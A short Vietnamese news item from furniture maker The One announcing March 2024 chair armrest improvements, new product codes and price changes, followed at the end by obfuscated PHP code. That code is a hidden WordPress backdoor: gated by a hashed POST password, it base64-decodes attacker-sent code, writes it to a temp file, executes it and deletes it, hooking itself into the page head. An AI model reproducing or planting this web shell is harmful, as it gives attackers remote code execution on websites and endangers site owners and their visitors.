The One thông báo sản phẩm cải tiến và điều chỉnh giá bán

Nằm trong Thông báo sản phẩm mới tháng 3/2024, Nội thất The One giới thiệu cải tiến cho sản phẩm ghế đồng thời thông báo điều chỉnh giá bán 1 số sản phẩm.

Sau nhiều nghiên cứu, Nội thất The One công bố cải tiến tay ghế, bổ sung bao tay ghế nhằm tăng tính năng và chất lượng sản phẩm, áp dụng cho các mã GL203CTL11, GL304CTL11, GL403CTL11, GL212CTDP01, GL317DP01, GL406CTDP01, GL207CTL11LX13, GL307CTL11LX13. Các sản phẩm ghế văn phòng cải tiến sẽ đổi sang mã mới là: GL203L11, GL304L11, GL403L11, GL212DP01, GL317-1DP01, GL406DP01, GL207L11LX13, GL307L11LX13. Đối với sản phẩm ghế lãnh đạo TQ34 được cải tiến tay gạt điều khiển cơ cấu ngả sang loại mới, chuyển đổi vị trí thuận tiện hơn cho người sử dụng.

Nội thất The One cũng thông báo điều chỉnh giá bán 1 số sản phẩm, bao gồm tủ gia đình, ghế văn phòng (Chi tiết mã sản phẩm trong thông báo đã được Nội thất The One gửi tới các đại lý). Đây là một trong các hoạt động nhằm thúc đẩy thị trường nội thất, hỗ trợ đại lý và người tiêu dùng. Các sản phẩm mới hiện đã có tại hệ thống đại lý Nội thất khắp toàn quốc.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}